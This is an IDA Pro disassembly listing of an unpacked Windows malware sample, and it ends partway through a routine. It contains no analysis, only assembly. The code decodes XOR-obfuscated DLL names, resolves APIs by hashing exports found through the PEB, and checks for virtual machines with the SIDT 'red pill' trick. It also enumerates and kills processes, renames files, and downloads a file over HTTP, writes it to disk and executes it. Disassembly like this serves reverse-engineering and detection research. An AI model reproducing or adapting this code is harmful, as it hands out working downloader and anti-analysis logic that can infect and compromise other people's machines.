;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 2BEE981C7234B918A5D8189BE526A270
; File Name : u:\work\2bee981c7234b918a5d8189be526a270_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_4010DC:loc_401128�p
; sub_401436+1F4�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_4]
push 100h
push 0
push esi
call sub_401080
xor eax, eax
add esp, 0Ch
cmp [esp+4+arg_8], eax
jle short loc_401031
mov ecx, [esp+4+arg_0]
loc_401021: ; CODE XREF: sub_401000+2F�j
mov dl, [ecx]
xor dl, 3
inc ecx
mov [eax+esi], dl
inc eax
cmp eax, [esp+4+arg_8]
jl short loc_401021
loc_401031: ; CODE XREF: sub_401000+1B�j
mov byte ptr [eax+esi], 0
pop esi
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401037 proc near ; CODE XREF: sub_4010DC:loc_40118C�p
push esi
mov eax, fs:[eax+30h]
test eax, eax
js short loc_40104C
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov eax, [eax+8]
jmp short loc_401055
; ---------------------------------------------------------------------------
loc_40104C: ; CODE XREF: sub_401037+7�j
mov eax, [eax+34h]
lea eax, [eax+7Ch]
mov eax, [eax+3Ch]
loc_401055: ; CODE XREF: sub_401037+13�j
pop esi
retn
sub_401037 endp
; ---------------------------------------------------------------------------
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401059 proc near ; CODE XREF: sub_401B6E+1E5�p
var_7 = byte ptr -7
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_1], 0
sidt fword ptr [ebp+var_7]
mov eax, dword ptr [ebp+var_7+2]
and eax, 0FFF00000h
cmp eax, 0FFC00000h
jnz short loc_40107A
mov [ebp+var_1], 1
loc_40107A: ; CODE XREF: sub_401059+1B�j
movzx eax, [ebp+var_1]
leave
retn
sub_401059 endp
; =============== S U B R O U T I N E =======================================
sub_401080 proc near ; CODE XREF: sub_401000+D�p
; sub_401436+E6�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
test ecx, ecx
jz short loc_4010AE
mov al, [esp+arg_4]
push ebx
mov bl, al
mov bh, bl
mov edx, ecx
push edi
mov edi, [esp+8+arg_0]
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
pop ebx
loc_4010AE: ; CODE XREF: sub_401080+6�j
mov eax, [esp+arg_0]
retn
sub_401080 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010B3 proc near ; CODE XREF: sub_4023D3+184�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
mov eax, [ebp+arg_4]
jz short loc_4010D3
mov ecx, [ebp+arg_0]
sub ecx, eax
loc_4010C4: ; CODE XREF: sub_4010B3+1E�j
mov dl, [eax]
dec [ebp+arg_8]
mov [ecx+eax], dl
inc eax
cmp [ebp+arg_8], 0
jnz short loc_4010C4
loc_4010D3: ; CODE XREF: sub_4010B3+A�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_4010B3 endp
; =============== S U B R O U T I N E =======================================
sub_4010D8 proc near ; CODE XREF: sub_4023D3+C�p
mov eax, [esp+0]
retn
sub_4010D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010DC proc near ; CODE XREF: sub_4010DC+58�p
; sub_4012A6+43�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, dword_404104
add eax, 0FFFFFFA1h
sub esp, 0Ch
cmp eax, 89h
ja short loc_4010F7
inc dword_404104
loc_4010F7: ; CODE XREF: sub_4010DC+13�j
mov eax, [ebp+arg_0]
dec eax
push esi
jz loc_40118C
dec eax
jz short loc_40117D
dec eax
jz short loc_40116E
dec eax
jz short loc_40115F
dec eax
jz short loc_401150
dec eax
jz short loc_401141
dec eax
jz short loc_40111B
loc_401114: ; CODE XREF: sub_4010DC+19F�j
xor eax, eax
jmp loc_40129E
; ---------------------------------------------------------------------------
loc_40111B: ; CODE XREF: sub_4010DC+36�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_40305C
loc_401128: ; CODE XREF: sub_4010DC+72�j
; sub_4010DC+81�j ...
call sub_401000
push 0C8AC8026h
push 1
call sub_4010DC
add esp, 14h
push esi
call eax
jmp short loc_401191
; ---------------------------------------------------------------------------
loc_401141: ; CODE XREF: sub_4010DC+33�j
push 0Ch
mov esi, offset dword_404108
push esi
push offset dword_40304C
jmp short loc_401128
; ---------------------------------------------------------------------------
loc_401150: ; CODE XREF: sub_4010DC+30�j
push 9
mov esi, offset dword_404108
push esi
push offset dword_403040
jmp short loc_401128
; ---------------------------------------------------------------------------
loc_40115F: ; CODE XREF: sub_4010DC+2D�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
jmp short loc_401128
; ---------------------------------------------------------------------------
loc_40116E: ; CODE XREF: sub_4010DC+2A�j
push 0Ah
mov esi, offset dword_404108
push esi
push offset dword_403028
jmp short loc_401128
; ---------------------------------------------------------------------------
loc_40117D: ; CODE XREF: sub_4010DC+27�j
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_40301C
jmp short loc_401128
; ---------------------------------------------------------------------------
loc_40118C: ; CODE XREF: sub_4010DC+20�j
call sub_401037
loc_401191: ; CODE XREF: sub_4010DC+63�j
mov edx, dword_404104
cmp edx, 59h
mov [ebp+arg_0], eax
jge short loc_4011A6
inc edx
mov dword_404104, edx
loc_4011A6: ; CODE XREF: sub_4010DC+C1�j
mov ecx, [ebp+arg_0]
mov eax, [ecx+3Ch]
mov esi, [eax+ecx+78h]
add esi, ecx
cmp edx, 7Ah
jge short loc_4011BE
inc edx
mov dword_404104, edx
loc_4011BE: ; CODE XREF: sub_4010DC+D9�j
mov eax, [ebp+arg_4]
shr eax, 10h
test ax, ax
jnz short loc_4011D5
movzx eax, word ptr [ebp+arg_4]
sub eax, [esi+10h]
jmp loc_401284
; ---------------------------------------------------------------------------
loc_4011D5: ; CODE XREF: sub_4010DC+EB�j
lea eax, [edx-4Dh]
cmp eax, 8Ah
ja short loc_4011E6
inc edx
mov dword_404104, edx
loc_4011E6: ; CODE XREF: sub_4010DC+101�j
push ebx
mov ebx, [esi+24h]
push edi
mov edi, [esi+20h]
add ebx, ecx
add edi, ecx
cmp edx, 12h
mov [ebp+var_C], ebx
jl short loc_401201
inc edx
mov dword_404104, edx
loc_401201: ; CODE XREF: sub_4010DC+11C�j
cmp edx, 0D6h
jle short loc_401212
push 19h
pop edx
mov dword_404104, edx
loc_401212: ; CODE XREF: sub_4010DC+12B�j
and [ebp+var_4], 0
cmp dword ptr [esi+18h], 0
jbe short loc_40125E
loc_40121C: ; CODE XREF: sub_4010DC+180�j
mov ecx, [edi]
add ecx, [ebp+arg_0]
and [ebp+var_8], 0
mov al, [ecx]
test al, al
jz short loc_401243
loc_40122B: ; CODE XREF: sub_4010DC+162�j
mov ebx, [ebp+var_8]
movsx eax, al
rol ebx, 7
xor ebx, eax
inc ecx
mov al, [ecx]
test al, al
mov [ebp+var_8], ebx
jnz short loc_40122B
mov ebx, [ebp+var_C]
loc_401243: ; CODE XREF: sub_4010DC+14D�j
mov eax, [ebp+arg_4]
cmp [ebp+var_8], eax
jz short loc_4012A1
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 4
inc ebx
inc ebx
cmp eax, [esi+18h]
mov [ebp+var_C], ebx
jb short loc_40121C
loc_40125E: ; CODE XREF: sub_4010DC+13E�j
mov eax, [ebp+arg_0]
loc_401261: ; CODE XREF: sub_4010DC+1C8�j
lea ecx, [edx-5Bh]
cmp ecx, 9Bh
pop edi
pop ebx
ja short loc_401275
inc edx
mov dword_404104, edx
loc_401275: ; CODE XREF: sub_4010DC+190�j
mov ecx, [ebp+var_4]
cmp ecx, [esi+18h]
jz loc_401114
mov ecx, [ebp+arg_0]
loc_401284: ; CODE XREF: sub_4010DC+F4�j
cmp edx, 0BCh
mov esi, [esi+1Ch]
lea eax, [esi+eax*4]
mov eax, [eax+ecx]
jge short loc_40129C
inc edx
mov dword_404104, edx
loc_40129C: ; CODE XREF: sub_4010DC+1B7�j
add eax, ecx
loc_40129E: ; CODE XREF: sub_4010DC+3A�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4012A1: ; CODE XREF: sub_4010DC+16D�j
movzx eax, word ptr [ebx]
jmp short loc_401261
sub_4010DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012A6 proc near ; CODE XREF: sub_401B6E+1F2�p
; sub_402908+12�p
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
cmp dword_404104, 0CDh
jge short loc_4012C1
inc dword_404104
loc_4012C1: ; CODE XREF: sub_4012A6+13�j
cmp byte_404209, 0
jz short loc_4012D1
mov al, byte_404208
leave
retn
; ---------------------------------------------------------------------------
loc_4012D1: ; CODE XREF: sub_4012A6+22�j
push 9C480E24h
push 1
mov byte_404209, 1
mov [ebp+var_94], 94h
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_94]
push ecx
call eax
cmp [ebp+var_84], 2
push 4Ah
pop ecx
setz al
push 0FFFFFFE5h
mov byte_404208, al
pop edx
loc_40130E: ; CODE XREF: sub_4012A6+78�j
cmp edx, 74h
ja short loc_401315
inc ecx
inc edx
loc_401315: ; CODE XREF: sub_4012A6+6B�j
add ecx, 21h
add edx, 21h
cmp ecx, 6Bh
jl short loc_40130E
mov dword_404104, ecx
leave
retn
sub_4012A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401328 proc near ; CODE XREF: sub_401436+252�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_404104, 0BEh
jge short loc_40133E
inc dword_404104
loc_40133E: ; CODE XREF: sub_401328+E�j
push ebx
push esi
push edi
xor edi, edi
inc edi
cmp [ebp+arg_0], 0
jz loc_40140F
mov esi, 99A4299Dh
push esi
push edi
call sub_4010DC
pop ecx
pop ecx
push [ebp+arg_0]
push edi
push edi
call eax
mov ebx, eax
test ebx, ebx
jz short loc_4013B3
push 44h
pop eax
push 8
pop ecx
loc_40136F: ; CODE XREF: sub_401328+5A�j
cmp ecx, 8Fh
ja short loc_401379
inc eax
inc ecx
loc_401379: ; CODE XREF: sub_401328+4D�j
add eax, 27h
add ecx, 27h
cmp eax, 7Dh
jl short loc_40136F
push 0FDC94385h
push edi
mov dword_404104, eax
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push ebx
call eax
mov esi, [ebp+var_4]
push 9E6FA842h
push edi
call sub_4010DC
pop ecx
pop ecx
push esi
push ebx
call eax
jmp short loc_401412
; ---------------------------------------------------------------------------
loc_4013B3: ; CODE XREF: sub_401328+3F�j
cmp dword_404104, 0Ah
jl short loc_4013C2
inc dword_404104
loc_4013C2: ; CODE XREF: sub_401328+92�j
cmp dword_404104, 0B3h
jle short loc_4013D8
mov dword_404104, 26h
loc_4013D8: ; CODE XREF: sub_401328+A4�j
push esi
push edi
call sub_4010DC
pop ecx
pop ecx
push [ebp+arg_0]
push 0
push edi
call eax
push 9E6FA842h
push edi
mov ebx, eax
call sub_4010DC
pop ecx
pop ecx
push 0FFFFFFFFh
push ebx
call eax
push 723EB0D5h
push edi
call sub_4010DC
pop ecx
pop ecx
push ebx
call eax
jmp short loc_401412
; ---------------------------------------------------------------------------
loc_40140F: ; CODE XREF: sub_401328+20�j
mov ebx, [ebp+arg_0]
loc_401412: ; CODE XREF: sub_401328+89�j
; sub_401328+E5�j
cmp dword_404104, 6Fh
jge short loc_401421
inc dword_404104
loc_401421: ; CODE XREF: sub_401328+F1�j
push 723EB0D5h
push edi
call sub_4010DC
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_401328 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401436 proc near ; CODE XREF: sub_401B6E+1FC�p
; sub_402908+ED�p ...
var_1318 = dword ptr -1318h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_116 = byte ptr -116h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1318h
call sub_402CA0
mov eax, dword_404104
add eax, 0FFFFFFB4h
cmp eax, 86h
ja short loc_401458
inc dword_404104
loc_401458: ; CODE XREF: sub_401436+1A�j
push ebx
push esi
push edi
push 774393E8h
push 1
call sub_4010DC
pop ecx
pop ecx
mov ebx, 100h
push ebx
lea ecx, [ebp+var_318]
push ecx
push 0
call eax
push 8AC4909Bh
push 5
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_C]
push ecx
push 1000h
lea ecx, [ebp+var_1318]
push ecx
call eax
test eax, eax
jz loc_40170A
push 60h
pop eax
push 32h
pop ecx
loc_4014A8: ; CODE XREF: sub_401436+87�j
cmp ecx, 0C7h
ja short loc_4014B2
inc eax
inc ecx
loc_4014B2: ; CODE XREF: sub_401436+78�j
add eax, 1Ch
add ecx, 1Ch
cmp eax, 0BAh
jl short loc_4014A8
and [ebp+var_4], 0
test [ebp+var_C], 0FFFFFFFCh
mov dword_404104, eax
jbe loc_40170F
mov edi, offset dword_404108
loc_4014DA: ; CODE XREF: sub_401436+2CC�j
mov ecx, [ebp+var_4]
mov esi, [ebp+ecx*4+var_1318]
test esi, esi
jz loc_4016F6
cmp eax, 4Eh
jge short loc_4014F7
inc eax
mov dword_404104, eax
loc_4014F7: ; CODE XREF: sub_401436+B9�j
push 99A4299Dh
push 1
call sub_4010DC
pop ecx
pop ecx
push esi
xor esi, esi
push esi
push 410h
call eax
push ebx
mov [ebp+var_8], eax
lea eax, [ebp+var_118]
push esi
push eax
call sub_401080
add esp, 0Ch
cmp [ebp+var_8], esi
jz loc_4016DE
push 189F16C9h
push 5
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_14]
push ecx
push 4
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_8]
call eax
test eax, eax
jz loc_4016DE
cmp dword_404104, 35h
jge short loc_401561
inc dword_404104
loc_401561: ; CODE XREF: sub_401436+123�j
mov esi, [ebp+var_10]
push 0E4FB2191h
push 5
call sub_4010DC
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_118]
push ecx
push esi
push [ebp+var_8]
call eax
mov esi, dword_403008
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
test eax, eax
jz loc_4016DE
cmp [ebp+var_117], 3Ah
jnz loc_4016DE
cmp [ebp+var_116], 5Ch
jnz loc_4016DE
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
mov esi, eax
jmp short loc_4015BF
; ---------------------------------------------------------------------------
loc_4015BE: ; CODE XREF: sub_401436+191�j
dec esi
loc_4015BF: ; CODE XREF: sub_401436+186�j
cmp [ebp+esi+var_118], 5Ch
jnz short loc_4015BE
push [ebp+arg_0]
call dword_403008 ; lstrlen
test eax, eax
jle short loc_401610
cmp dword_404104, 87h
jge short loc_4015E8
inc dword_404104
loc_4015E8: ; CODE XREF: sub_401436+1AA�j
push [ebp+arg_0]
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jnz loc_4016DE
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_1318]
jmp loc_40171C
; ---------------------------------------------------------------------------
loc_401610: ; CODE XREF: sub_401436+19E�j
cmp dword_404104, 0C4h
jge short loc_401622
inc dword_404104
loc_401622: ; CODE XREF: sub_401436+1E4�j
push 0Bh
push edi
push offset dword_40306C
call sub_401000
push 8A94F707h
push 7
call sub_4010DC
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
test eax, eax
jnz loc_4016DE
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_118]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_4016DE
push edi
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_4016DE
mov eax, [ebp+var_4]
push [ebp+eax*4+var_1318]
call sub_401328
pop ecx
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_218]
push eax
call dword_403000 ; lstrcpy
push 1
push edi
push offset dword_403068
call sub_401000
add esp, 0Ch
push edi
lea eax, [ebp+var_218]
push eax
call dword_40300C ; lstrcat
push 20E4E9EDh
push 1
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_218]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
loc_4016DE: ; CODE XREF: sub_401436+F1�j
; sub_401436+116�j ...
push 723EB0D5h
push 1
call sub_4010DC
pop ecx
pop ecx
push [ebp+var_8]
call eax
mov eax, dword_404104
loc_4016F6: ; CODE XREF: sub_401436+B0�j
mov ecx, [ebp+var_C]
inc [ebp+var_4]
shr ecx, 2
cmp [ebp+var_4], ecx
jb loc_4014DA
jmp short loc_40170F
; ---------------------------------------------------------------------------
loc_40170A: ; CODE XREF: sub_401436+66�j
mov eax, dword_404104
loc_40170F: ; CODE XREF: sub_401436+99�j
; sub_401436+2D2�j
cmp eax, 0AFh
jge short loc_40171C
inc eax
mov dword_404104, eax
loc_40171C: ; CODE XREF: sub_401436+1D5�j
; sub_401436+2DE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401436 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401721 proc near ; CODE XREF: sub_401B6E+293�p
; sub_401B6E+307�p ...
var_87C = byte ptr -87Ch
var_47C = byte ptr -47Ch
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 87Ch
push ebx
xor ebx, ebx
cmp dword_404104, 0Dh
mov [ebp+var_4], ebx
mov [ebp+var_14], ebx
mov [ebp+var_20], 7D0h
jl short loc_401749
inc dword_404104
loc_401749: ; CODE XREF: sub_401721+20�j
cmp dword_404104, 0D1h
jle short loc_40175F
mov dword_404104, 18h
loc_40175F: ; CODE XREF: sub_401721+32�j
push esi
push edi
mov esi, 400h
push esi
lea eax, [ebp+var_87C]
push ebx
push eax
call sub_401080
push 534D481h
push 3
mov [ebp+var_18], esi
call sub_4010DC
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_87C]
push ecx
push ebx
call eax
push 5
mov edi, offset dword_404108
push edi
push offset aUfq24 ; "ufq24"
call sub_401000
add esp, 0Ch
push edi
lea eax, [ebp+var_87C]
push eax
call dword_40300C ; lstrcat
push 3Bh
pop eax
push 0FFFFFFE9h
mov [ebp+var_1C], ebx
pop ecx
loc_4017C0: ; CODE XREF: sub_401721+B1�j
cmp ecx, 7Ch
ja short loc_4017C7
inc eax
inc ecx
loc_4017C7: ; CODE XREF: sub_401721+A2�j
add eax, 1Ah
add ecx, 1Ah
cmp eax, 8Ah
jl short loc_4017C0
push 4
mov dword_404104, eax
pop edi
loc_4017DC: ; CODE XREF: sub_401721+3D5�j
push 8593DD7h
push edi
call sub_4010DC
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_87C]
push ecx
call eax
push 0B87DBD66h
push edi
mov [ebp+var_C], eax
call sub_4010DC
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_0]
push [ebp+var_C]
call eax
cmp dword_404104, 0Eh
mov [ebp+var_8], eax
jl short loc_401824
inc dword_404104
loc_401824: ; CODE XREF: sub_401721+FB�j
cmp dword_404104, 0A9h
jle short loc_40183A
mov dword_404104, 1Bh
loc_40183A: ; CODE XREF: sub_401721+10D�j
push 1AD09C78h
push edi
call sub_4010DC
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 2
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_4010DC
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 6
push [ebp+var_C]
call eax
push 1AD09C78h
push edi
call sub_4010DC
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 5
push [ebp+var_C]
call eax
push 2Ah
pop eax
push 0FFFFFFE2h
pop ecx
loc_40188B: ; CODE XREF: sub_401721+17F�j
cmp ecx, 0A8h
ja short loc_401895
inc eax
inc ecx
loc_401895: ; CODE XREF: sub_401721+170�j
add eax, 12h
add ecx, 12h
cmp eax, 0A5h
jl short loc_40188B
push 2F5CE027h
push edi
mov dword_404104, eax
mov [ebp+var_14], ebx
mov [ebp+var_4], edi
call sub_4010DC
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_14]
push ecx
push 20000005h
push [ebp+var_8]
call eax
mov eax, [ebp+var_14]
lea ecx, [eax-401h]
cmp ecx, 48FDEh
ja loc_4019FD
mov eax, dword_404104
add eax, 0FFFFFFA9h
cmp eax, 83h
ja short loc_4018F7
inc dword_404104
loc_4018F7: ; CODE XREF: sub_401721+1CE�j
push 8F8F114h
push 1
call sub_4010DC
pop ecx
pop ecx
push ebx
push 80h
push edi
push ebx
push 2
push 40000000h
push [ebp+arg_4]
call eax
push esi
mov [ebp+var_10], eax
lea eax, [ebp+var_47C]
push ebx
push eax
mov [ebp+var_4], ebx
call sub_401080
push 1A212962h
push edi
mov [ebp+var_18], esi
call sub_4010DC
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
mov ecx, dword_404104
test eax, eax
setnz al
add ecx, 0FFFFFFAAh
cmp ecx, 75h
ja short loc_4019CE
inc dword_404104
jmp short loc_4019CE
; ---------------------------------------------------------------------------
loc_40196A: ; CODE XREF: sub_401721+2B0�j
cmp al, bl
jz short loc_4019D3
mov eax, [ebp+var_4]
push 0F3FD1C3h
push 1
mov [ebp+var_24], eax
call sub_4010DC
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_28]
push ecx
push [ebp+var_24]
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_10]
call eax
push esi
lea eax, [ebp+var_47C]
push ebx
push eax
call sub_401080
push 1A212962h
push edi
mov [ebp+var_18], esi
mov [ebp+var_4], ebx
call sub_4010DC
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz al
loc_4019CE: ; CODE XREF: sub_401721+23F�j
; sub_401721+247�j
cmp [ebp+var_4], ebx
ja short loc_40196A
loc_4019D3: ; CODE XREF: sub_401721+24B�j
mov eax, dword_404104
add eax, 0FFFFFFC1h
cmp eax, 0B6h
ja short loc_4019E8
inc dword_404104
loc_4019E8: ; CODE XREF: sub_401721+2BF�j
push 723EB0D5h
push 1
call sub_4010DC
pop ecx
pop ecx
push [ebp+var_10]
call eax
jmp short loc_401A10
; ---------------------------------------------------------------------------
loc_4019FD: ; CODE XREF: sub_401721+1BB�j
add eax, 0FFFFFFFEh
cmp eax, 3FEh
ja short loc_401A10
mov [ebp+arg_8], bl
jmp short loc_401A10
; ---------------------------------------------------------------------------
loc_401A0C: ; CODE XREF: sub_401721+315�j
cmp al, bl
jz short loc_401A38
loc_401A10: ; CODE XREF: sub_401721+2DA�j
; sub_401721+2E4�j ...
push 1A212962h
push edi
call sub_4010DC
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_8]
call eax
test eax, eax
setnz al
cmp [ebp+var_4], ebx
ja short loc_401A0C
loc_401A38: ; CODE XREF: sub_401721+2ED�j
cmp dword_404104, 0AAh
jge short loc_401A4A
inc dword_404104
loc_401A4A: ; CODE XREF: sub_401721+321�j
push 7314FB0Ch
push edi
call sub_4010DC
pop ecx
pop ecx
push [ebp+var_8]
call eax
push 7314FB0Ch
push edi
call sub_4010DC
pop ecx
pop ecx
push [ebp+var_C]
call eax
mov eax, dword_404104
add eax, 0FFFFFFCFh
cmp eax, 0A0h
ja short loc_401A83
inc dword_404104
loc_401A83: ; CODE XREF: sub_401721+35A�j
push 8F8F114h
push 1
call sub_4010DC
pop ecx
pop ecx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call eax
push 0AEF7CBF1h
push 1
mov [ebp+var_10], eax
call sub_4010DC
pop ecx
pop ecx
push ebx
push [ebp+var_10]
call eax
push 723EB0D5h
push 1
mov [ebp+var_24], eax
call sub_4010DC
pop ecx
pop ecx
push [ebp+var_10]
call eax
inc [ebp+var_1C]
cmp dword_404104, 1Ch
jge short loc_401AE5
inc dword_404104
loc_401AE5: ; CODE XREF: sub_401721+3BC�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_24]
jz short loc_401AFC
cmp [ebp+var_1C], 5
jge short loc_401AFC
cmp [ebp+arg_8], bl
jnz loc_4017DC
loc_401AFC: ; CODE XREF: sub_401721+3CA�j
; sub_401721+3D0�j
cmp dword_404104, 5Ah
pop edi
pop esi
jge short loc_401B0D
inc dword_404104
loc_401B0D: ; CODE XREF: sub_401721+3E4�j
lea ecx, [eax-2]
cmp ecx, 3FEh
ja short loc_401B1C
xor eax, eax
jmp short loc_401B6B
; ---------------------------------------------------------------------------
loc_401B1C: ; CODE XREF: sub_401721+3F5�j
cmp [ebp+arg_8], bl
jz short loc_401B68
add eax, 0FFFFFBFFh
cmp eax, 48FDEh
ja short loc_401B68
push 40h
lea eax, [ebp+var_78]
push ebx
push eax
mov [ebp+var_7C], 44h
call sub_401080
push 46318AC7h
push 1
call sub_4010DC
add esp, 14h
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_7C]
push ecx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_4]
push ebx
call eax
xor eax, eax
inc eax
jmp short loc_401B6B
; ---------------------------------------------------------------------------
loc_401B68: ; CODE XREF: sub_401721+3FE�j
; sub_401721+40A�j
or eax, 0FFFFFFFFh
loc_401B6B: ; CODE XREF: sub_401721+3F9�j
; sub_401721+445�j
pop ebx
leave
retn
sub_401721 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B6E proc near ; CODE XREF: sub_402908:loc_402C55�p
; DATA XREF: sub_40275A+149�o
var_3B8 = byte ptr -3B8h
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1A8 = byte ptr -1A8h
var_198 = byte ptr -198h
var_188 = byte ptr -188h
var_178 = byte ptr -178h
var_168 = byte ptr -168h
var_158 = byte ptr -158h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_38 = byte ptr -38h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
push ebp
mov ebp, esp
sub esp, 3B8h
push ebx
push esi
push edi
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
call sub_401000
mov edi, 0C8AC8026h
push edi
push 1
call sub_4010DC
add esp, 14h
push esi
call eax
push 0Ah
push esi
push offset aVpfq01Goo ; "vpfq01-goo"
call sub_401000
push edi
push 1
call sub_4010DC
add esp, 14h
push esi
call eax
push 0Ch
push esi
push offset aHfqmfo01Goo ; "hfqmfo01-goo"
call sub_401000
push edi
push 1
call sub_4010DC
add esp, 14h
push esi
call eax
push 3Dh
pop eax
push 0FFFFFFF3h
pop ecx
